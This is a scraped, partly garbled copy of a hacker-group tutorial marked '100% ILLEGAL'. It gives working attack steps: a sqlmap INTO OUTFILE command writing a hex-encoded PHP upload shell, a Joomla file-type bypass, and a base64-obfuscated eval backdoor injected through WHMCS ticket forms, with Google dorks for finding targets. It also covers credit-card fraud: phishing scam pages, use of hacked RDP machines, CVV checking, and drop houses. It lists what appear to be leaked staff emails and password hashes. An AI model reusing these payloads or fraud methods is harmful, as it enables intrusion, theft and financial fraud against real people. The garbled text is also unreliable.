hacking conference 2014

8/10/2019 Hacking Conference 2014

http://slidepdf.com/reader/full/hacking-conference-2014 1/22

DOCS HACKING CONFERENCEHacking Conference Docs is a documentation contains

articles about the basic science of hacking.

Part : II

Author : Xcaramel

100 % ILLEGAL

INDONESIAN GREY HAT ARMYRIAU HACKER TEAM

CODE RIAU COMMUNITY



DISCLAIMER :

This article is for educational use only and do not in any use.

I am not responsible if anything happens.

Personal contact : [email protected]

Visit Us :

igha.net - code-riau.org - blog.code-riau.orgindogreyhatarmy.net - indogreyhatarmy.com

www.indogreyhatarmy.org



Article Content

- How to upload shell use sqlmap- how to upload file in joomla administrator that do not

support- How to Bypass Register Com Users set only for

superadmin- WHMCS Exploit Submit Ticket

- Carding the method scam page- How to use RDP- Checking CVV and Direct Carding



-How to upload shell use sqlmap

1 . First we must have a target first course,example my targethttp://www.example.com/index.php?id=1

2. prepare your uploader script, as below.

PHP Code:

<form enctype ="multipart/form-data" action ="upload.php" method ="POST" ><input name ="uploadedfile" type ="file" />< input type ="submit" value ="Upload File" /></ form > <? php $target_path =basename ( $_FILES [ 'uploadedfile' ][ 'name' ]);if( move_uploaded_file ( $_FILES [ 'uploadedfile' ][ 'tmp_name' ], $targe

t_path )){echo basename ( $_FILES [ 'uploadedfile' ][ 'name' ]). " has been uploaded" ;}else{echo "Error!" ;} ?>

previously used to convert the above script into a hex gan beforeit can be uploaded, the results are as belowConvert script Upload Hex --> http://www.string-functions.com/string-hex.a spx

PHP Code:

3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3

d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e

Next Open Your CMDC:\user\xcaramel>cd c:\SqlmapC:\Sqlmap>C:\Sqlmap>sqlmap.py -u http://www.example.com/index.php?id=1 --sql-shell

would such as this :[15:35:06] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.3.5, Apache 2.2.17



back-end DBMS: MySQL 5[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell>

Now type SELECT 0x'Hex 'INTO OUTFILE "PATH / filename";Do not forget to add '0 x 'in front of' HEX '0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c455

35b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f 20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f 7221223b7d3f3einto "/home/siemens/public_html/upload.php";

wait and if lucky you will be notified successfully uploaded, if less fortunate so try again

if it works please browse our files earlier,Http://www.example.com/upload.phpnext upload your files .

igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.comwww.indogreyhatarmy.org



- -how to uadministr

1. after login in th2. select options

load file in joomlator that do not sup

administrator open the media m

ort

nager



Command: - Legalof files names, wesitu

and Illegal MIMEPHP in situ,3. if it is then we s

Now we try to uplwill upload a php

Extensions (File Types) there aresimply add the PHP file name, seq

ypes in the column we add the na

ve, if successful will be like this

ad a php file in media manager. Tile file name: kondom.php

any types ential in

e of the

his time I



If Successfully wo

igha.net - code-riau.org - b

ld like

log.code-riau.org - indogreyhatarmy.net - indogrewww.indogreyhatarmy.org

hatarmy.com



- How to Byset only foRegistration faileAdmin permisionaccounts.

The first - all the wayright-click and then c

pass Register Comr superadmin

: Registration failed: Only userscan change other Super Admin

out the word - the word "Registrationlick Inspect Elementlalu replace "Regist

sers

ith Super ser

ailed" you ration Failed"



to "Registration Succ

Form input the datathen click on Registr

it will have the wordlink has been sent toactivate the accountemail before you can


ess" and then click Enter!!

ccording to your wishes tion

"our account has been created and anthe email address you entered. Note thby clicking on the activation link whenlogin."


activation at you must

ou get the

hatarmy.com



WHMCS Exploit Submit TicketGoogle Dork :intext:Powered by WHMCompleteSolution inurl:submitticket.php

intext:Powered by WHMCompleteSolution inurl:clients/submitticket.phpintext:Powered by WHMCompleteSolution inurl:client/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:crm/submitticket.phpintext:Powered by WHMCompleteSolution inurl:cp/submitticket.phpintext:Powered by WHMCompleteSolution inurl:manage/submitticket.phpintext:Powered by WHMCompleteSolution inurl:member/submitticket.phpintext:Powered by WHMCompleteSolution inurl:members/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billing/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billings/submitticket.php

intext:Powered by WHMCompleteSolution inurl:support/submitticket.phpintext:Powered by WHMCompleteSolution inurl:help/submitticket.phpintext:Powered by WHMCompleteSolution inurl:secure/submitticket.phpintext:Powered by WHMCompleteSolution inurl:store/submitticket.phpintext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.phpintext:Powered by WHMCompleteSolution inurl:log/submitticket.phpintext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.phpintext:Powered by WHMCompleteSolution inurl:orders/submitticket.phpintext:Powered by WHMCompleteSolution inurl:order/submitticket.phpintext:Powered by WHMCompleteSolution inurl:portal/submitticket.phpintext:Powered by WHMCompleteSolution inurl:mc/submitticket.php

intext:Powered by WHMCompleteSolution inurl:office/submitticket.phpintext:Powered by WHMCompleteSolution inurl:submitticket.php site:comintext:Powered by WHMCompleteSolution inurl:submitticket.php site:orgintext:Powered by WHMCompleteSolution inurl:submitticket.php site:netintext:Powered by WHMCompleteSolution inurl:submitticket.php site:infointext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"

Examples of targets: www.xcaramel.com/client/submitticket.php



3. if it can be now time to send the ticket targetPut the following code in the Form Name, subject, content.{php }eval( base64_decode ( 'JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHN

JQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=' )) ;{/ php })



replace url submitticket.ph

Example: http://xcaramel.

Next : upload youigha.net - code-riau.org - b

p so / templates / jxh.php

om/client/templates/jxh.php

files .log.code-riau.org - indogreyhatarmy.net - indogre

www.indogreyhatarmy.org

hatarmy.com



- Carding th1. Scam page: PAYPA2. Inbox Mailer: Toolinbox detective not t3. Mail list: some emFull Name :James Kamau : jkidamOnline Standard : onlineFidel Osano :fosanoMatthewShahi : mshahPeter Munji : pmunjiLucy kaigua : lkaigua

Peter Njau : pnjauDorcas Tuikong : dtuikoLeonard indiazi : lindiazStandard Test : jmuny

4. Letter Chase: emaiemail containing a cidentity will switch t

5. Thinking ability an- Step Step In Here

method scam pag L, VISA, AMAZON, Ebay, Apple s for sending mail to many people direc

o spam ail that you want to at least 100 victims

Email : Password [email protected] : 66e62a11e534d2a5eb

standardmedia.co.ke : d593fe21fbc9cf394e2 standardmedia.co.ke : a387b826d086fa84db

@standardmedia.co.ke : 9d593fe21fbc9cf394e @standardmedia.co.ke : d10b4c5c4f54832b49 @standardmedia.co.ke : e1cd51b7ccf75ddebc

standardmedia.co.ke : 089543e7ade4bef696 [email protected] : 22479cdfaa364ff81a

[email protected] : fc63540458ad4ce5c [email protected] :7c7bbd96546a331b

l in html format which will be sent to tnfirmation email from the web in a scaour webscam

d imagination in developing a combat t

ly to your

jadiin email

e062d0ca2b6be 6725e6b8586

5335e80ed27a1 296725e6b8586

e0aaf1c33cd8d 270e19cbba31b

39c9d96c952b2 3bff00544790d

48cde5f07ccefc 8c24258e63b65

e target to charge

ol



• First we have to edprocess.php or usualcode: $ No email senchange in process.phshell-other• The second we do- First we have to setsee the picture belo

it can be changed anpaypal.com com atotell of course, we hasee the following pic

it some parts of the scam page, which ily converted into a send-cc.php find thed in depanya aja tuh change so email, ap The next plug in your scam page hosti

se email sending mailers jangn forget l up the email subject that will be used

:

the key should not wear that in the eato do away with paypal.co co.uk, aftere to think

ure:

part following

ter email ng and other

tternya ore dal,

d domains. that what we



The red line is transfindependence, edit iand put the letter inremember do not ussee the following pic

if successful then the


rmed into a scam link you here we areusing notepad, then after that copy allhe column do not forget to email a curplain html.

ure:

re is success and if the notice failing un


in need of the scripts

ent tick

efine.

hatarmy.com



- How to use RDP

RDP stands for Remote Desktop Computer; they are normally hackedor bruted random computers.When using you must remember its someone else's computer sodon't download things withouthiding it or use it intensely as the admin can notice, and you will loseyour RDP.

To connect to RDP: Start<Run<Type:mstscA screen will pop up waiting for an IP to be typed.Type the IP and hit connect. The person you bought RDP from will tellyou the login info.When you buy an RDP it will usually look something like thisIP: 98.200.27.44U: administrator P:

After connecting make sure it has Firefox, if not download Firefoxportable and hide itsomewhere within the computer so it can be used without them

noticing.

Download Link:http://portableapps.com/apps/internet/firefox_portableAfter opening the Firefox add the Sock5 that you will be using tomake your IP appear in the cc holder’s area.This is generally secure enough for basic carding but if you want totake the extra

precaution you can connect to the RDP through a VPN. For those whodon’t know, VPN is short for virtual private network, a network that isconstructed by using public wires to connect nodes. These systemsuse encryption and other security mechanisms to ensure that onlyauthorized users can access the network and that the data cannot beintercepted. I don't



love VPN's because even though some sites say they don't log in factthey do. If theFeds/Cops contacted your VPN provider, they have ways of seeingwhere and what you have beenconnecting/doing on the net through their VPN. But it still does cover your IP one more wayso it isn't bad to have a VPN.

There are two sites I recommend for VPN.http://secretsline.biz/en/prices/http://unblockvpn.com/

Secrets Line is a higher quality VPN and has many more locations. Irecommend them but they

don't take payments like PayPal or Money Bookers, and their pricesare a bit higher.Unblockvpn is very cheap for a dedicated IP, only 10$ a month andthey accept PayPal so itis a much more convenient and cheaper, but the VPN service is a bitless professional.

So to sum it up for security1. Change/Cap your network using Sock52. Use Sock5 on RDP to make it more secure3. Total security :(Optional but recommended) VPN<RDP<Sock5How

to Access an RDPIf you are using Windows XP, click Start>RunIf you are using Vista or Windows 7, Click start and in the Entry fieldthat says “Search Programs and Files”

For Apple/Mac computers then please download this program for connecting to RDPwww.microsoft.com/mac/products/remote-desktop/default.mspxType in “mstsc” and hit enter. This will bring up the Remote DesktopWindow. Follow the images provided here to give you a better idea of what to do



igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.comwww.indogreyhatarmy.org



- Checking CVV and Direct Carding

The best place to check CVV's is actually iTunes.. Make a new account and simply add the credit card onto it. If it getsaccepted then the credit card is alive and working well if declinedthen the credit card is dead. Many believe that its best to donate for checkingcredit's but it raises a flag to banks when they see random donationsto places like the redcross foundation.

Checked Vs. Unchecked CVV's When a vendor says the credit card ischecked it means he has checked it and is alive, this usually means he has his own checker or merchant account that has this ability. I don’t recommend buyingchecked CVVs as they will usually die quicker and get flagged bybanks. I always buy small amounts of unchecked CVV's at atime and use them within a day so that if it is dead,the vendor can replace. Most vendors replace unchecked within 24hours and don’treplace checkedcredit cards.

Carding Directly Without GiftcardNEVER this will almost always be investigated and highly illegal. Theonly way to do this would be if you have a drop house. This meansAn empty home, a house for sale/renting, or justa house that the person is not there. You can but I don’t recommendto card items directly therehalf the time the item will not be left at the door and it can bedangerous as sometimes thecops will investigate it.If you’regoing to do this it can be successful, but don’t ever order to your



SPESIAL THANKS :

INDONESIAN GREY HAT ARMYRIAU HACKER TEAM

CODE RIAU COMMUNITY

ALL FAMILY INDONESIAN GREY HAT ARMYXie Log - Xcaramel – Xsmouth - SF-Resistance 125 - Codex

H4xor - Ac.Dc - 4Sp1r3 - Biawak Litak - Heartachez - Semeru -The Darkness - Blackboot404 - Zhafran - Ghozie - Otong2 -

Ryuunosuke-sama - CakCukLet88 - D'troid 101 - tioblack67 -indeX - AR.1701 – K4mfret Dot ID and all member .

ALL FAMILY RIAU HACKER TEAMXie Log - 730-80Y – Key Lock a.k.a F4Lc0n – Ghozie - Juragan

JengkoL – Gue Berbagi a.k.a Echo Unicode - 0tong2 – Zh4fran – index and all member .

AND YOU THANK YOU

hacking conference 2014

Documents